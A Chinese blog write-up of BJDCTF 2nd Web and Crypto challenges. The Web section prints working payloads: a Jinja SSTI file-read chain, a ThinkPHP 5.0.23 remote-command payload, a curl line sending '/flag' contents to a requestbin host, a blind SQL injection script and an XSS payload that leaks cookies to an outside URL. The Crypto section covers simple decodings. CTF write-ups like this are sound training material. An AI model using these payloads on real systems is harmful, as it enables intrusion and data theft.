[BJDCTF 2nd] Web&Crypto Write up

WEB

  • 0x01 fake google

打开题目是一个谷歌的搜索框,随便输入点什么,原样回显

%title插图%num

看下源码有个hint

%title插图%num

是一个ssti(服务器模板注入),直接网上搜个python3的payload:

{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}

%title插图%num

  • 0x02 old-hack

查看源码,没有什么有用的信息,看到页面有TP5,t框架有s参数可以加载模块。

tp5.0.23

%title插图%num

payload:

_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

%title插图%num

  • 0x03 duangshell

Vim文件泄露(.swp备份文件)
.index.php.swp 拖进kalivim -r复原

%title插图%num

curl http://requestbin.xxx -X POST -d "`head /flag`"
  • 0x04 简单注入

过滤了引号 select,post传参username=\&password=||1#发现回显变了,布尔盲注

%title插图%num

import requests
url = 'http://b41c99b0-2b25-4d43-86f8-6ddddd580bee.node3.buuoj.cn'

def str2hex(string):
    c = '0x'
    a = ''
    for i in string:
        a += hex(ord(i))
    return c + a.replace('0x', '')

alphabet = ['!', '[', ']', '{', '}', '_', '/', '-', '&', "%", '#', '@', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
            'g', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',
            'E', 'F', 'G', 'H', 'I', 'G', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
            'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']

flag = '^'
for i in range(0, 20):
    for y in alphabet:
        tmp = flag + y
        data = {
            "username": "P3rh4ps\\",
            "password": "||password regexp binary {}#".format(str2hex(tmp))
        }
        #     print(data['password'])
        x = requests.session()
        if 'BJD needs' in x.post(url, data=data).text:
            #    print(x.post(url,data=data).text)
            flag = tmp
            break
    print(flag.replace("^", ""))

%title插图%num

看了师傅的wp,直接substr(password,1,1)然后登录就可以拿到flag了。

  • 0x05 假猪套天下第一

打开是一个登陆界面,admin会登陆失败,其他都能登进去,用burpsuit抓下包

%title插图%num

发现有一个L0g1n.php,访问一下源码里有
Sorry, this site will be available after totally 99 years!

cookie处发现一个叫time的cookie,存放的是当前的时间戳,把他改大改到99年以后即可。

%title插图%num

接下来就是修改header的问题了
%title插图%num

base64解码
ZmxhZ3swMjkyOWZmMi1hNmMyLTRmNmYtOGJjZi0yNDgyOGZlYmJmNTV9Cg==
flag{02929ff2-a6c2-4f6f-8bcf-24828febbf55}

  • 0x06 Schrödinger
    打开题目,先查看源码,有个test.php,访问一下,是一个登录页面,题目页面多了两个回显,burpsuit抓包,发现一个可疑cookie值,是一个base64,decode 一下发现是一个时间戳。

    %title插图%num

    尝试删除时间戳,发现成功率%99+,cheek,弹出b站av号
    最后在b站评论区拿到flag

  • 0x07 xss之光

.git泄露
githack扫描得到源码

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

利用php的原生类进行xss payload

<?php
$a = serialize(new Exception("<script>window.location.href='xxxx'+document.cookie</script>"))
echo $a;

flag在cookies中

  • 0x08 Element Master

打开是一幅漫画,查看源码

%title插图%num

发现

%title插图%num

hex成字符串Po.php 访问时一个点
漫画上说all 118 elements,其他元素也可能存在的文件,写个python脚本跑一下:

import requests
url = "http://32544ec9-b86b-403c-9e57-113b4f2f6c6b.node3.buuoj.cn/{}.php"
elements = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
                  'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
                  'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
                  'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
                  'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
                  'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
                  'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
for x in elements:
    urls = url.format(x)
    r = requests.get(urls)
    if r.status_code == 200:
        print(r.text,end="")
    else:
        continue

%title插图%num

访问得到flag
%title插图%num


Crypto

  • 0x01 签到

QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ==

base64

  • 0x02 老文盲了

罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝

汉字翻译成拼音

bì jí dì dà kuò hào zhè jiù shì fǔ lài gē zhí jiē jiāo lè bā dà kuò hào

BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}

  • 0x03 cat_flag

吃鸡腿是1不吃鸡腿是0,二进制解码。

%title插图%num

  • 0x04 灵能精通

%title插图%num

flag{IMKNIGHTSTEMPLAR}

  • 0x05 燕言燕语

一看就是16进制解码
yanzi ZJQ{xilzv_iqssuhoc_suzjg}
维吉尼亚解码
BJD{yanzi_jiushige_shabi}

  • 0x06 Y1nglish

https://www.quipqiup.com/

BJD{pyth0n_Brut3_f0rc3_oR_quipquip_AI_Cr4cy}

翻译一下 quipquip破解

BJD{pyth0n_Brut3_f0rc3_oR_quipquip_AI_Cr4ck}

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇